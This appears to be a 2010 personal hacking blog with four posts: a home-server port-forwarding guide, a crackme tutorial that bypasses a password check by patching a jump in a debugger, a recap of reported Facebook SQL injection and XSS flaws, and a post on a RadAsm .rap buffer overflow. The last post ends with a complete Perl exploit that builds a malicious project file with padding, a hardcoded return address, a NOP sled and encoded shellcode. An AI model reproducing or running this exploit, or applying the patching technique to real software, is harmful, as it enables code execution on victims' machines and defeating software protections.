Pages

Tuesday, September 21, 2010

Public a home-made server

Hey Guys,

Many days ago , i was trying to make my own FTP server on my main Desktop machine , and suffered of some problems , but fortunately they were fixed successfully .

I'm going to make that little walkthrough on how to public a home made server in such a way that all people around the world would access it and download from it.

PS:This method works on any port you need to open in your pc , just the difference will be in the port's number .

First ,you will need a program that will realize your server on your machine , for example , if you are using Microsoft Windows , you will have to install Microsoft Internet Information Services ( IIS ) , if you have a ubuntu machine ( or linux generally ) there is many programs for that like apache server, vsftpd and others .

Second step( actually THE MOST IMPORTANT step ), you will need to forward the port to your local machine ip address in your network , for example if you want to open port 21 , then you must launch your ADSL modem script ( which is always  your local machine ip address with '1' in the end , for example if your local ip address is 192.168.0.52  , then your ADSL modem script will be 192.168.0.1 ) and then you will enter on Advanced tab ( for most modems )and choose " Port Forwarding " , some ADSL modems masks that option with the name "Virtual Server" , and you will enter the service name and your local ip address .
Example ::>
My ADSL modem is ADSL Wireless 11g Firewall router ( OfficeConnect/3Com ):

I've seen many ADSL modems that has the Virtual Server/Port Forwarding option under the advanced Tab , in my modem , it's under the Firewall Tab :

Then , we have to choose the service of the port if it is a popular one ( i mean NOT a backdoor if the user is a pentester or a security professional )
:


And as shown , i've entered the last number which is my local ip address ( 192.168.1.7 ).
And that's all , now every packet will be sent to the ADSL modem IP Address will be redirected to your local machine which has the port of the packets redirected should be opened to receive packets .
Now all you have to do is that you have to public ftp://<WAN IP Address> ,
The WAN IP Address could be found on any of these sites :>
1)  Site One
2)  Site Two
3)  Site Three
Example:>
If your WAN IP is 43.235.16.233 then you will share your server like so :>
ftp://43.235.16.233/ << if your server is offering FTP services .
http://43.235.16.233/ << if your server is a usual http server .


Also you can give your ip a domain name , either a free one or a purchased one by pointing the domain to your ADSL Modem IP Address .

Regards
Jacky

Friday, July 2, 2010

Little Cracking Tutorial

Hey Guys ,

After finishing my exams , i decided to make a little program that asks the user for a valid password to crack it .
Well , here are the program codes ::>


When you execute the program , and feed it with a wrong guess password , it will give u this message::>
Excellent , so now we know that the program scan our input and check if it is the right password or no.

Let's play more deeper , we will open it within a debugger ( i'm using immunity , but you can use your favorite one ) :
 Now , we are going to search for all text and strings in the program hopefully to find something useful :
We will find that there are many strings , we will play with the known one which is " Enter your password: " :
Now , double click on the string that we have chosen , we should notice that we will land on an area full of instructions with some jumbs that i will talk about it later on :
If we looked deeper , we will notice ( with a basic knowledge in assembly ) the instruction of the test case , it tests if the user input will be equal the string or not , if it is , the zero flag ( ZF ) will be equal to 0 and if it is not it will be equal to 1 , after that , we should notice also the JNZ instruction ::>
This instruction made the execution flow goes to the message ( Sorry, wrong Guess ) which belong to the address ( 0040136D ) , so now we need the program to take our password and tell us that this is a right guess password , we have to choices we can do here , the first is that we can change the jump if not zero instruction to jump if zero ( JZ ) , and the second one is that we can change the address of the message ,
so instead of jumping to ( Sorry , wrong guess ) , it will jump to ( Nice guess ) and of course all that in the case where we entered a wrong password so the zero flag will be equal to 1 ::>
Of course , you should have noticed that the address of the other message is 0040135F , now if we saved our work and launched the program and feed it with any wrong password it will give us ::>
Ok , now and after we cracked that little program , there is a great site that anyone can practice his cracking skills , http://crackmes.de .
PS: You can make a stack overflow in that program by filling the password by a very big number of strings ( more than 500 ) .

Friday, May 7, 2010

Facebook ,When pets become gnarled !

Hey guys,
Today , i've read many various posts about some dangerous vulnerabilities into Facebook site ,so i decided to share it with you to avoid such attacks ( and another reason is that all people trust very much that site and share their real information which would be - like in this case - very risky )!
So What's Facebook ?Facebook is a social networking site which became recently the first social site in the world,the site has more than 400 million active users all over the world ( believe it ! ) .
From Inj3ct0r's site ,they have been able to find an SQL Injection vulnerability at one of Facebook's applications :  http://apps.facebook.com/tvshowchat/show.php?id=1 ,And then they listed a number of users and their accounts ( now i think you know why sharing real information is risky ! Not yet ? well , continue... ).
The more dangerous is that they were able to upload a php shell which is able to control Facebook server !
Now they could change accounts , steal passwords , modify what ever article they want , etc...
Furthermore , that's not the only vulnerability discovered , Also they discovered an XSS vulnerability in the way that Facebook continue your search string to bring you what you need exactly and rapidly .
When you want to search about something , you go to the search bar and type in ( only the first letters ) what u want and then you will notice that Facebook continues your string with some of those that are known to the site.Say that you need to search about a group , you will type the first letters and then the site will suggest for you some of his known groups . Well , that's not that hard , we can make this kind of search by this block of html codes :
<img src=
<br><br><br>
<textarea
So , in this case , if you tried to search the word iframe ( and there is something called iframe ) facebook will continue your string , and then the implementation will be by html codes (Incredible , isn't it ? )!!!
Also , There are a couple of vulnerabilities that were discovered by Alexander Sotirov ,one of them was interesting which is the invalid UTF8 characters vulnerability !

Well , Now , i guess that you may want to delete your  Facebook account ! Hey , Life is not that bad :P
Facebook is still * The One * and the most interesting social site .But Remember , there isn't any site that has a hundred percent security structure ( unless all hackers die !!! ).

Regards

Thursday, February 11, 2010

Radasm .rap Stack buffer overflow !

Hey guys ,
While i was checking  for new vulnerabilities , i found this exploit in a program named (Radasm ) which suffers of a buffer overflow when executing a malicious .rap file with the right header and the right end-header - as i name it - .
Here is the original exploit ::> http://www.exploit-db.com/exploits/11400 ( It's not discovered by me , it's discovered by Dz_attacker, so all rights are reserved to him ! )
Just a small fuzzing stuff , i noticed that the header was ::>
[Project]
Assembler=masm
Group=1
GroupExpand=1
[Files]
1=AVP [JUNK-STUFF AREA]
And the end-header was ::>
2=AVP Over.Inc
[MakeFiles]
0=AVP Over.res
[MakeDef]
Menu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0
1=4,O,$B\RC.EXE /v,1
2=3,O,$B\ML.EXE /c /coff /Cp /no6Cogo /I"$I",2
3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3
4=0,0,,5
5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res
6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",*.asm
7=0,0,"$E\OllyDbg",5
[Group]
Group=Added files,Assembly,Resources,Misc,Modules
1=1
Well , i tried to just copy/paste the header and the end-header to my codes and put the shellcode in the middle , and the same happened ( PWNED!)
But Dz_attacker made the right thing by transforming the header and the end-header to hex-bytes characters, because if anyone just tried to copy/paste it like me , he must makes some important stuff ( like putting before every " a backslash to be like so \"  , also before every backslash to be like so \\ )
That was boring & long but interesting ( at least for me :P ) !
And here is my vulnerability script written in perl ::>
#!/usr/bin/perl -w
my $file="Crash.rap";
my $header="[Project]\nAssembler=masm\nGroup=1\nGroupExpand=1\n[Files]\n1=AVP ";
my $end="\n2=AVP Over.Inc\n[MakeFiles]\n0=AVP Over.res\n[MakeDef]\nMenu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0\n1=4,O,$B\\RC.EXE /v,1\n2=3,O,$B\\ML.EXE /c /coff /Cp /no6Cogo /I\"$I\",2\n3=5,O,$B\\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:\"$L\" /OUT:\"$5\",3\n4=0,0,,5\n5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res\n6=*.obj,O,$B\\ML.EXE /c /coff /Cp /nologo /I\"$I\",*.asm\n7=0,0,\"$E\\OllyDbg\",5\n[Group]\nGroup=Added files,Assembly,Resources,Misc,Modules\n1=1";
my $junk="A"x257;
my $eip=pack('V',0x7E4456F7); #7E4456F7 from USER32.dll <<<<< !!!
my $presc="SEXYSEXYSEXY";
my $esp="\x90"x20;
$esp=$esp."\xd9\xc5\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x11\xba\x83\x9b" .
"\x0c\x12\x31\x57\x18\x03\x57\x18\x83\xc7\x87\x79\xf9\x7a" .
"\xc3\x5d\x22\x7b\xa3\xcd\x75\x35\x76\x86\x14\xe9\x55\x76" .
"\x8f\xc9\xf1\x13\x2e\x62\x8b\xb2\xc4\x0b\x03\x16\x40\x8f" .
"\xa6\xf0\xe6\x2e\x26\x21\x9f\xf3\xd9\x53\x3a\x7d\xc3\xa5" .
"\x1f\x2e\x5d\x90\xcc\x6a\x8d\x1b\xb6\xf2\xb2\xf7\x09\xd0" .
"\x1f\x43\x7b\x2d\x1e\xcf\x83\x62";
open(INI,">$file");
print INI $header.$junk.$eip.$presc.$esp.$end;
close(INI);

And here is the result ::>